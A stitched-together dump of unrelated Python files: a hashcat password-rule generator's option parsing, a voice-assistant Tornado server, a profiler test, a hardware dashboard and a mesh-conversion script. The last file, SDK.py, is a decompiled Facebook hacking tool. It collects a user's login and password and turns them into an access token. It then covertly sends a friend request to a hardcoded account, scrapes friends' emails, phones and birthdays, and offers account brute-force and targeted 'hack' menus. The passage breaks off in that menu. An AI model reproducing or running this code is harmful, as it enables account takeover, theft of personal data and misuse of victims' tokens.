wordtune.add_option(
"--maxworddist",
help="Maximum word edit distance (Levenshtein)",
type="int",
default=10,
metavar="10",
)
wordtune.add_option(
"--maxwords",
help="Maximum number of source word candidates to consider",
type="int",
default=5,
metavar="5",
)
wordtune.add_option(
"--morewords",
help="Consider suboptimal source word candidates",
action="store_true",
default=False,
)
wordtune.add_option(
"--simplewords",
help="Generate simple source words for given passwords",
action="store_true",
default=False,
)
parser.add_option_group(wordtune)
ruletune = OptionGroup(parser, "Fine tune rule generation:")
ruletune.add_option(
"--maxrulelen",
help="Maximum number of operations in a single rule",
type="int",
default=10,
metavar="10",
)
ruletune.add_option(
"--maxrules",
help="Maximum number of rules to consider",
type="int",
default=5,
metavar="5",
)
ruletune.add_option(
"--morerules",
help="Generate suboptimal rules",
action="store_true",
default=False,
)
ruletune.add_option(
"--simplerules",
help="Generate simple rules insert,delete,replace",
action="store_true",
default=False,
)
ruletune.add_option(
"--bruterules",
help="Bruteforce reversal and rotation rules (slow)",
action="store_true",
default=False,
)
parser.add_option_group(ruletune)
spelltune = OptionGroup(parser, "Fine tune spell checker engine:")
spelltune.add_option(
"--providers",
help="Comma-separated list of provider engines",
default="aspell,myspell",
metavar="aspell,myspell",
)
spelltune.add_option(
"--language",
help="Language for spellchecker to use",
default="en",
metavar="en",
)
parser.add_option_group(spelltune)
debug = OptionGroup(parser, "Debuggin options:")
debug.add_option(
"-v",
"--verbose",
help="Show verbose information.",
action="store_true",
default=False,
)
debug.add_option(
"-d", "--debug", help="Debug rules.", action="store_true", default=False
)
debug.add_option(
"--password",
help="Process the last argument as a password not a file.",
action="store_true",
default=False,
)
debug.add_option(
"--word", help="Use a custom word for rule analysis", metavar="Password"
)
debug.add_option(
"--hashcat",
help="Test generated rules with hashcat-cli",
action="store_true",
default=False,
)
parser.add_option_group(debug)
(options, args) = parser.parse_args()
# Print program header
if not options.quiet:
print(header)
if len(args) < 1:
parser.error("no passwords file specified")
exit(1)
try:
rulegen = RuleGen(
language=options.language,
providers=options.providers,
basename=options.basename,
threads=options.threads,
)
except enchant.errors.DictNotFoundError:
print(
"[-] Cannot find a dictionary for specified language. "
"Please install it and try again."
)
print(
"[*] Hint: Usually this dictionary resides within an "
"aspell / myspell package."
)
exit(-1)
# Finetuning word generation
rulegen.max_word_dist = options.maxworddist
rulegen.max_words = options.maxwords
rulegen.more_words = options.morewords
rulegen.simple_words = options.simplewords
# Finetuning rule generation
rulegen.max_rule_len = options.maxrulelen
rulegen.max_rules = options.maxrules
rulegen.more_rules = options.morerules
rulegen.simple_rules = options.simplerules
rulegen.brute_rules = options.bruterules
if rulegen.brute_rules:
print("[!] Bruteforcing reversal and rotation rules. (slower)")
# Debugging options
rulegen.word = options.word
rulegen.verbose = options.verbose
rulegen.debug = options.debug
rulegen.hashcat = options.hashcat
rulegen.quiet = options.quiet
# Make multiprocessing use fork method instead of spawn
multiprocessing.set_start_method("fork", force=True)
# Custom language
print(f"[*] Using language: '{rulegen.enchant.tag}'")
# Custom wordlist
if not options.word:
if options.wordlist:
print(f"[*] Loading wordlist: {options.wordlist} ...")
rulegen.load_custom_wordlist(options.wordlist)
print(
f"[*] Using Enchant {rulegen.enchant.provider.name} module. "
"For best results please install"
)
print(f" '{rulegen.enchant.provider.name}' module language dictionaries.")
# Analyze a single password or several passwords in a file
if options.password:
rulegen.analyze_password(args[0])
else:
rulegen.analyze_passwords_file(args[0])
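    # Example invocations (assuming this script is saved as rulegen.py; the
    # password and file name below are placeholders):
    #   python rulegen.py --verbose --password P@ssw0rd123
    #   python rulegen.py -b rockyou rockyou.txt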
|
server.py
|
import os
import yaml
import json
import time
import base64
import random
import hashlib
import asyncio
import requests
import markdown
import threading
import subprocess
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
from tools import make_json, solr_tools
from robot import config, utils, logging, Updater, constants
logger = logging.getLogger(__name__)
conversation, wukong = None, None
commiting = False
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
if not self.get_secure_cookie('validation'):
return False
return str(self.get_secure_cookie("validation"), encoding='utf-8') == config.get('/server/validate', '')
def validate(self, validation):
if '"' in validation:
validation = validation.replace('"', '')
return validation == config.get('/server/validate', '') or validation == str(self.get_cookie('validation'))
class MainHandler(BaseHandler):
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch(wukong._dev)
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices=info['notices']
self.render('index.html', update_info=info, suggestion=suggestion, notices=notices)
else:
self.render('index.html')
class MessageUpdatesHandler(BaseHandler):
"""Long-polling request for new messages.
Waits until new messages are available before returning anything.
"""
async def post(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
cursor = self.get_argument("cursor", None)
messages = conversation.getHistory().get_messages_since(cursor)
while not messages:
# Save the Future returned here so we can cancel it in
# on_connection_close.
self.wait_future = conversation.getHistory().cond.wait()
try:
await self.wait_future
except asyncio.CancelledError:
return
messages = conversation.getHistory().get_messages_since(cursor)
if self.request.connection.stream.closed():
return
res = {'code': 0, 'message': 'ok', 'history': json.dumps(messages)}
self.write(json.dumps(res))
def on_connection_close(self):
self.wait_future.cancel()
class ChatHandler(BaseHandler):
def onResp(self, msg, audio, plugin):
logger.debug('response msg: {}'.format(msg))
res = {'code': 0, 'message': 'ok', 'resp': msg, 'audio': audio, 'plugin': plugin}
self.write(json.dumps(res))
def post(self):
global conversation
if self.validate(self.get_argument('validate', default=None)):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
if query == '':
res = {'code': 1, 'message': 'query text is empty'}
self.write(json.dumps(res))
else:
conversation.doResponse(query, uuid, onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile, onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
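        # Request fields handled above (names taken from the get_argument()
        # calls; values are supplied by the web client):
        #   type=text  -> validate, type, query, uuid
        #   type=voice -> validate, type, voice (base64-encoded wav data that
        #                 is downsampled to 16 kHz before recognition)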
class GetHistoryHandler(BaseHandler):
def get(self):
global conversation
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory().cache)}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate', default=None)):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
if self.validate(self.get_argument('validate', default=None)):
configStr = self.get_argument('config')
try:
                yaml.safe_load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
            except Exception:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class QAHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(constants.getQAPath(), 'r') as f:
content = f.read()
self.render('qa.html', content=content)
def post(self):
if self.validate(self.get_argument('validate', default=None)):
qaStr = self.get_argument('qa')
qaJson = os.path.join(constants.TEMP_PATH, 'qa_json')
try:
make_json.convert(qaStr, qaJson)
solr_tools.clear_documents(config.get('/anyq/host', '0.0.0.0'),
'collection1',
config.get('/anyq/solr_port', '8900')
)
solr_tools.upload_documents(config.get('/anyq/host', '0.0.0.0'),
'collection1',
config.get('/anyq/solr_port', '8900'),
qaJson,
10
)
with open(constants.getQAPath(), 'w') as f:
f.write(qaStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except Exception as e:
logger.error(e)
res = {'code': 1, 'message': '提交失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class APIHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/api.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate', default=None)):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
print('success')
self.set_secure_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
def get(self):
if self.isValidated():
self.set_secure_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret": config.get('/server/cookie_secret', "__GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__"),
"template_path": os.path.join(constants.APP_PATH, "server/templates"),
"static_path": os.path.join(constants.APP_PATH, "server/static"),
"login_url": "/login",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/chat/updates", MessageUpdatesHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/qa", QAHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler),
(r"/photo/(.+\.(?:png|jpg|jpeg|bmp|gif|JPG|PNG|JPEG|BMP|GIF))", tornado.web.StaticFileHandler, {'path': config.get('/camera/dest_path', 'server/static')}),
(r"/audio/(.+\.(?:mp3|wav|pcm))", tornado.web.StaticFileHandler, {'path': constants.TEMP_PATH}),
(r'/static/(.*)', tornado.web.StaticFileHandler, {'path': 'server/static'})
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
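    # Keys this module reads from the /server section of the configuration (an
    # illustrative sketch; the actual file layout is owned by robot.config):
    #   server:
    #     enable: true
    #     port: '5000'
    #     username: <login user name>
    #     validate: <md5 hex digest of the login password>
    #     cookie_secret: <your own random value>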
|
test_xla_profiler.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
from multiprocessing import Event, Process
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.profiler import XLAProfiler
from pytorch_lightning.utilities import _TPU_AVAILABLE
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
if _TPU_AVAILABLE:
import torch_xla.debug.profiler as xp
import torch_xla.utils.utils as xu
@RunIf(tpu=True)
def test_xla_profiler_instance(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, profiler="xla", accelerator="tpu", devices=8)
assert isinstance(trainer.profiler, XLAProfiler)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
@pytest.mark.skipif(True, reason="XLA Profiler doesn't support Prog. capture yet")
def test_xla_profiler_prog_capture(tmpdir):
port = xu.get_free_tcp_ports()[0]
training_started = Event()
def train_worker():
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=4, profiler="xla", accelerator="tpu", devices=8)
trainer.fit(model)
p = Process(target=train_worker, daemon=True)
p.start()
training_started.wait(120)
logdir = str(tmpdir)
xp.trace(f"localhost:{port}", logdir, duration_ms=2000, num_tracing_attempts=5, delay_ms=1000)
p.terminate()
    # glob expands the wildcard run-directory segment; os.isfile does not exist
    assert glob.glob(os.path.join(logdir, "plugins", "profile", "*", "*.xplane.pb"))
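# Note on test_xla_profiler_prog_capture: xp.trace() connects to a profiler
# server running inside the traced process (torch_xla exposes this via
# xp.start_server(port)), so programmatic capture assumes the training worker
# is serving that endpoint on the chosen port.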
|
explorerphat.py
|
import time
from threading import Thread
from explorerphatdashboard.api.explorerphat.analog import Analog as ApiAnalog
from explorerphatdashboard.api.explorerphat.connection import Connection
from explorerphatdashboard.api.explorerphat.input import Input as ApiInput
from explorerphatdashboard.api.explorerphat.motor import Motor as ApiMotor
from explorerphatdashboard.api.explorerphat.output import Output as ApiOutput
from explorerphatdashboard.frames.views.connecting import Connecting as ConnectingView
from explorerphatdashboard.frames.views.disconnecting import Disconnecting as DisconnectingView
from explorerphatdashboard.frames.views.explorerphat import ExplorerPhat as ExplorerPhatView
from scriptcore.console.asciimatics.framelogic import FrameLogic
class ExplorerPhat(FrameLogic):
"""
The logic for the ExplorerPhatFrame
"""
def __init__(self, screen):
"""
Initiate the explorer phat frame
:param screen:
"""
super(ExplorerPhat, self).__init__(screen)
self._view = ExplorerPhatView(self._screen,
on_load=self._on_load,
on_output_toggle=self._on_output_toggle,
on_motor_min_click=self._on_motor_min_click,
on_motor_plus_click=self._on_motor_plus_click,
on_exit=self._on_exit)
self._connection = Connection.get_connection()
def get_view(self):
"""
Get the view
:return:
"""
return self._view
def _on_load(self):
"""
On load
:return:
"""
self._open_connection()
def _open_connection(self):
"""
Open connection
:return:
"""
connecting_view = ConnectingView(self._screen, on_cancel=lambda x: self._on_exit())
self._view.add_effect_to_scene(connecting_view)
def open_connection():
self._connection.open()
self._update_all_items()
connecting_view.close()
self._on_connected()
thread = Thread(target=open_connection)
thread.start()
def _on_connected(self):
"""
On connected
:return:
"""
self._start_auto_update()
def _start_auto_update(self):
"""
Start the auto update
:return:
"""
def update():
while self._connection.is_open():
self._update_all_items()
time.sleep(0.5)
thread = Thread(target=update)
thread.start()
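        # The polling thread above re-reads every input/output/analog/motor
        # value twice per second and exits on its own once _on_exit() closes
        # the connection, because the loop re-checks is_open() on each pass.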
def _update_all_items(self):
"""
Update all items
:return:
"""
for input_id in self._view.get_input_ids():
self._view.set_input(input_id, (ApiInput(input_id)).on)
for output_id in self._view.get_output_ids():
self._view.set_output(output_id, (ApiOutput(output_id)).on)
for analog_id in self._view.get_analog_ids():
self._view.set_analog(analog_id, (ApiAnalog(analog_id)).value)
for motor_id in self._view.get_motor_ids():
self._view.set_motor(motor_id, (ApiMotor(motor_id)).speed)
def _on_output_toggle(self, output_id):
"""
On output toggle
:param output_id:
:return:
"""
(ApiOutput(output_id)).toggle()
# This is a fix so the dashboard keeps updating.
self._view._outputs[output_id].focus()
def _on_motor_min_click(self, motor_id):
"""
On motor min click
:param motor_id:
:return:
"""
motor = ApiMotor(motor_id)
speed = motor.speed
speed -= 10
if speed < -100:
speed = -100
motor.speed = speed
# This is a fix so the dashboard keeps updating.
self._view._motors[motor_id].focus()
def _on_motor_plus_click(self, motor_id):
"""
On motor plus click
:param motor_id:
:return:
"""
motor = ApiMotor(motor_id)
speed = motor.speed
speed += 10
if speed > 100:
speed = 100
motor.speed = speed
# This is a fix so the dashboard keeps updating.
self._view._motors[motor_id].focus()
def _on_exit(self):
"""
On exit click
:return:
"""
disconnecting_view = DisconnectingView(self._screen)
self._view.add_effect_to_scene(disconnecting_view)
self._connection.close()
disconnecting_view.close()
self._change_scene("Dashboard")
|
meshConvertT.py
|
import os
import subprocess
from threading import Thread
def f(name):
    # Run gmshToFoam inside each case directory. Passing cwd= to the child
    # process avoids os.chdir(), which changes the working directory for the
    # whole process and is not safe with one conversion thread per case.
    if os.path.isdir(name) and name != "blank_foamcase":
        subprocess.call('gmshToFoam busemann.msh', shell=True, cwd=name)
if __name__ == "__main__":
dirs = os.listdir()
for name in dirs:
t = Thread(target=f, args=(name,))
t.start()
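    # Usage sketch (assumption: the script is launched from the directory that
    # holds one case folder per mesh, each containing a busemann.msh file):
    #   python meshConvertT.py
    # Every matching directory gets its own conversion thread, so the
    # gmshToFoam runs proceed in parallel.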
|
SDK.py
|
#Decompiled by MR.K7C8NG
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMR.K7C8NG\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mInDoNeSiA CYBER ErRoR SyStEm\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mGUNAKAN DENGAN BIJAK \x1b[1;97m/ \x1b[1;96mMR.K7C8NG\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/pashayogi\x1b[0m\n[*] Decompiled by MR.K7C8NG\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK AKUN FB \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
menu ()
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. LogOut '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/nganunymous')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
